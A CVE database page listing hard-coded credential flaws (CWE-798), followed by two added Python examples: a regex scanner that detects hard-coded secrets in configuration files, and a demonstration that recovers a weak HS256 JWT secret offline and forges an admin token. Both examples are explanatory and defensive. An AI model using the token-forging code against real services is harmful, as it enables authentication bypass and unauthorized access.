Vulnerabilities (CVE)

Filtered by CWE-798
Total 1481 CVE
CVE Vendors Products Updated CVSS v2 CVSS v3
CVE-2022-41399 1 Sage 1 Sage 300 2025-01-31 N/A 7.5 HIGH
The optional Web Screens feature for Sage 300 through version 2022 uses a hard-coded 40-byte blowfish key ("PASS_KEY") to encrypt and decrypt the database connection string for the PORTAL database found in the "dbconfig.xml". This issue could allow attackers to obtain access to the SQL database.
CVE-2022-41398 1 Sage 1 Sage 300 2025-01-31 N/A 7.5 HIGH
The optional Global Search feature for Sage 300 through version 2022 uses a set of hard-coded credentials for the accompanying Apache Solr instance. This issue could allow attackers to login to the Solr dashboard with admin privileges and access sensitive information.
CVE-2023-27921 1 Jins 2 Jins Meme, Jins Meme Firmware 2025-01-31 N/A 6.5 MEDIUM
JINS MEME CORE Firmware version 2.2.0 and earlier uses a hard-coded cryptographic key, which may lead to data acquired by a sensor of the affected product being decrypted by a network-adjacent attacker.
CVE-2022-41400 1 Sage 1 Sage 300 2025-01-30 N/A 9.8 CRITICAL
Sage 300 through 2022 uses a hard-coded 40-byte blowfish key to encrypt and decrypt user passwords and SQL connection strings stored in ISAM database files in the shared data directory. This issue could allow attackers to decrypt user passwords and SQL connection strings.
CVE-2023-26089 1 Echa.europa 1 Iuclid 2025-01-30 N/A 9.8 CRITICAL
European Chemicals Agency IUCLID 6.x before 6.27.6 allows authentication bypass because a weak hard-coded secret is used for JWT signing. The affected versions are 5.15.0 through 6.27.5.
CVE-2024-49806 1 Ibm 1 Security Verify Access 2025-01-29 N/A 9.4 CRITICAL
IBM Security Verify Access Appliance 10.0.0 through 10.0.8 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data.
CVE-2024-49805 1 Ibm 1 Security Verify Access 2025-01-29 N/A 9.4 CRITICAL
IBM Security Verify Access Appliance 10.0.0 through 10.0.8 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data.
CVE-2024-31873 1 Ibm 1 Security Verify Access 2025-01-28 N/A 7.5 HIGH
IBM Security Verify Access Appliance 10.0.0 through 10.0.7 contains hard-coded credentials which it uses for its own inbound authentication that could be obtained by a malicious actor. IBM X-Force ID: 287317.
CVE-2023-30354 1 Tenda 2 Cp3, Cp3 Firmware 2025-01-27 N/A 9.8 CRITICAL
Shenzen Tenda Technology IP Camera CP3 V11.10.00.2211041355 does not defend against physical access to U-Boot via the UART: the Wi-Fi password is shown, and the hardcoded boot password can be inserted for console access.
CVE-2023-30352 1 Tenda 2 Cp3, Cp3 Firmware 2025-01-27 N/A 9.8 CRITICAL
Shenzen Tenda Technology IP Camera CP3 V11.10.00.2211041355 was discovered to contain a hard-coded default password for the RTSP feed.
CVE-2023-30351 1 Tenda 2 Cp3, Cp3 Firmware 2025-01-27 N/A 7.5 HIGH
Shenzen Tenda Technology IP Camera CP3 V11.10.00.2211041355 was discovered to contain a hard-coded default password for root which is stored using weak encryption. This vulnerability allows attackers to connect to the TELNET service (or UART) by using the exposed credentials.
CVE-2024-46505 2025-01-23 N/A 9.1 CRITICAL
Infoblox BloxOne v2.4 was discovered to contain a business logic flaw due to thick client vulnerabilities.
CVE-2023-4539 1 Comarch 1 Erp Xl 2025-01-23 N/A 7.5 HIGH
Use of a hard-coded password for a special database account created during Comarch ERP XL installation allows an attacker to retrieve embedded sensitive data stored in the database. The password is same among all Comarch ERP XL installations. This issue affects ERP XL: from 2020.2.2 through 2023.2.
CVE-2023-6255 1 Utarit 1 Solipay Mobile 2025-01-23 N/A 7.5 HIGH
Use of Hard-coded Credentials vulnerability in Utarit Information Technologies SoliPay Mobile App allows Read Sensitive Strings Within an Executable. This issue affects SoliPay Mobile App: before 5.0.8.
CVE-2024-49060 1 Microsoft 1 Azure Stack Hci 2025-01-23 N/A 8.8 HIGH
Azure Stack HCI Elevation of Privilege Vulnerability
CVE-2024-45832 2025-01-17 N/A 4.3 MEDIUM
Hard-coded credentials were included as part of the application binary. These credentials served as part of the application authentication flow and communication with the mobile application. An attacker could access unauthorized information.
CVE-2024-57811 2025-01-16 N/A 9.1 CRITICAL
In Eaton X303 3.5.16 - X303 3.5.17 Build 712, an attacker with network access to a XC-303 PLC can login as root over SSH. The root password is hardcoded in the firmware. NOTE: This vulnerability appears in versions that are no longer supported by Eaton.
CVE-2023-28937 1 Saison 1 Dataspider Servista 2025-01-09 N/A 8.8 HIGH
DataSpider Servista version 4.4 and earlier uses a hard-coded cryptographic key. DataSpider Servista is data integration software. ScriptRunner and ScriptRunner for Amazon SQS are used to start the configured processes on DataSpider Servista. The cryptographic key is embedded in ScriptRunner and ScriptRunner for Amazon SQS and is common to all users. If an attacker gains access to a target DataSpider Servista instance and obtains a Launch Settings file of ScriptRunner and/or ScriptRunner for Amazon SQS, the attacker may perform operations with the privileges of the user whose credentials are encrypted in that file. Note that DataSpider Servista and some of the OEM products are affected by this vulnerability. For the details of affected products and versions, refer to the information listed in [References].
CVE-2023-33778 1 Draytek 143 Myvigor, Vigor1000b, Vigor1000b Firmware and 140 more 2025-01-09 N/A 9.8 CRITICAL
Draytek Vigor Routers firmware versions below 3.9.6/4.2.4, Access Points firmware versions below v1.4.0, Switches firmware versions below 2.6.7, and Myvigor firmware versions below 2.3.2 were discovered to use hardcoded encryption keys which allows attackers to bind any affected device to their own account. Attackers are then able to create WCF and DrayDDNS licenses and synchronize them from the website.
CVE-2024-29063 1 Microsoft 1 Azure Ai Search 2025-01-09 N/A 7.3 HIGH
Azure AI Search Information Disclosure Vulnerability
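The entries above share one root cause (CWE-798): a key or password baked into the product (a Blowfish key in a config loader, an admin password for a bundled Solr, a database password inside a connection string, a root password in firmware) that is identical on every install and recoverable by anyone with the binary or a config file. The following is an added example, not code from this page or from any listed vendor: a minimal scanner of the kind a practitioner runs over a source or config tree to catch that pattern before it ships. The sample configuration is constructed for the demo; the variable names, rule names and thresholds are the example's own assumptions.

```python
"""Added example (not any vendor's code): a small CWE-798 detector.
Flags credential-named assignments with literal values and passwords
embedded in connection strings; skips env/vault lookups, file paths and
placeholders to keep false positives down. Sample input is constructed."""
import re
from typing import List, Optional, Tuple

# Identifier fragments that usually name a credential or key (assumption).
SECRET_NAME = re.compile(r"pass(?:word|wd)?|pwd|secret|token|api[_-]?key|[_.]key", re.I)
# name = value  or  name: value ; the value is the rest of the line.
ASSIGN = re.compile(r"^\s*([A-Za-z_][\w.\-]*)\s*[=:]\s*(.+?)\s*$")
QUOTED = re.compile(r"""^["']([^"']{8,})["']""")      # "literal" of >= 8 chars
BARE = re.compile(r"""^[^\s"'#]{8,}$""")               # unquoted literal, e.g. .properties
# password=... inside a connection string or URL query, not at the start of a key name
EMBEDDED_PW = re.compile(r"""(?:^|[;?&\s])(?:password|pwd)\s*=\s*([^;&\s"']{8,})""", re.I)
PLACEHOLDERS = {"changeme", "example", "redacted", "placeholder", "xxxxxxxx"}

# Constructed sample: not any real product's configuration.
SAMPLE_CONFIG = """\
# constructed sample config, not any vendor's real file
PASS_KEY = "7c1a9e0f4b2d8c6a5e3f1b9d0c8a7e6f4d2b1a0c"
solr.admin.password=Admin123!
db.connection=Server=db01;User Id=portal;Password=P0rtalPwd!;
jwt_secret = os.environ["JWT_SECRET"]
api_token = "dummy"
ssl_key_file = "/etc/ssl/private/server.key"
"""


def literal_value(rhs: str) -> Optional[str]:
    """Return the literal if rhs is a hard-coded value, else None.
    Env lookups and calls contain quotes/brackets and never match QUOTED or
    BARE as a whole; paths and shell/template expansions are skipped."""
    m = QUOTED.match(rhs)
    value = m.group(1) if m else (rhs if BARE.match(rhs) else None)
    if value is None or value.lower() in PLACEHOLDERS:
        return None
    if value.startswith(("/", "${", "$(", "%")):
        return None  # file path or expansion, not a secret value
    return value


def redact(value: str) -> str:
    """Never echo the secret itself into a report or ticket."""
    return value[:3] + "*" * (len(value) - 3)


def scan(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, rule, redacted_value) for each finding."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue
        m = ASSIGN.match(line)
        if m and SECRET_NAME.search(m.group(1)):
            value = literal_value(m.group(2))
            if value is not None:
                findings.append((lineno, "hard-coded secret in assignment", redact(value)))
                continue
        m = EMBEDDED_PW.search(line)
        if m:
            findings.append((lineno, "password embedded in connection string", redact(m.group(1))))
    return findings


def flagged_lines(text: str) -> List[int]:
    return [lineno for lineno, _, _ in scan(text)]


if __name__ == "__main__":
    for lineno, rule, shown in scan(SAMPLE_CONFIG):
        print(f"line {lineno}: {rule}: {shown}")
```

Run as-is it flags lines 2, 3 and 4 of the sample and leaves the environment lookup, the short placeholder and the key file path alone. Pairing the scan with a pre-commit hook or a CI job is the usual deployment; the remediation it points at is the same in every entry above: generate the secret per installation (at install time or first boot), store it outside the shipped artifact, and make it rotatable.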
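The IUCLID entry above (CVE-2023-26089) is the sharpest illustration of why a hard-coded secret is an authentication bypass rather than "just" an information leak: with HS256 the JWT signing secret is the only thing standing between a user and any claims they like, and a weak or shared secret can be recovered offline from one captured token. The following added example, which is not code from this page, from IUCLID or from ECHA, shows the attacker's side and the fix using only the standard library. The weak secret value, the wordlist and the claim names are constructed for the demo and are not the real product's.

```python
"""Added example (not any vendor's code): forging an HS256 JWT once a weak,
hard-coded signing secret is recovered offline, versus a per-deployment
random secret. Standard library only; secret and wordlist are constructed."""
import base64
import hashlib
import hmac
import json
import secrets
from typing import Iterable, Optional


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Mint an HS256 JWT: b64url(header).b64url(claims).b64url(HMAC-SHA256)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode("ascii"), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def verify_hs256(token: str, secret: bytes) -> Optional[dict]:
    """Server side: return the claims if the signature is valid, else None."""
    try:
        header, payload, sig = token.split(".")
        if json.loads(_b64url_decode(header)).get("alg") != "HS256":
            return None  # pin the algorithm: no 'none', no RS256->HS256 confusion
        expected = hmac.new(secret, f"{header}.{payload}".encode("ascii"), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(sig)):
            return None
        return json.loads(_b64url_decode(payload))
    except (ValueError, UnicodeDecodeError, AttributeError):
        return None


def recover_secret(token: str, wordlist: Iterable[str]) -> Optional[bytes]:
    """Offline dictionary attack. A captured token is a free oracle for the
    secret: no requests to the server, no lockout, nothing in its logs."""
    for word in wordlist:
        if verify_hs256(token, word.encode()) is not None:
            return word.encode()
    return None


def forge_admin_token(captured_token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Attacker side: recover the secret, then re-sign the same token with
    an elevated role claim. Returns None if the secret is not guessable."""
    secret = recover_secret(captured_token, wordlist)
    if secret is None:
        return None
    claims = dict(verify_hs256(captured_token, secret))
    claims["role"] = "admin"
    return sign_hs256(claims, secret)


WEAK_SECRET = b"secret"             # hypothetical hard-coded value, same on every install
STRONG_SECRET = secrets.token_bytes(32)  # generated per deployment, kept out of the source tree
WORDLIST = ["password", "changeme", "admin123", "secret", "jwtsecret"]  # constructed

if __name__ == "__main__":
    for label, secret in (("weak", WEAK_SECRET), ("strong", STRONG_SECRET)):
        issued = sign_hs256({"sub": "alice", "role": "user"}, secret)
        forged = forge_admin_token(issued, WORDLIST)
        print(label, "->", verify_hs256(forged, secret) if forged else "attack failed")
```

With the weak secret the forged token verifies as `role: admin`; with the 32-byte random secret the dictionary pass finds nothing and the server keeps seeing `role: user`. The fix is therefore not a longer hard-coded string but a secret that is generated at install time, stored outside the shipped artifact, and rotatable; an asymmetric signing scheme (RS256/ES256) additionally keeps the verifying side from ever holding the signing key.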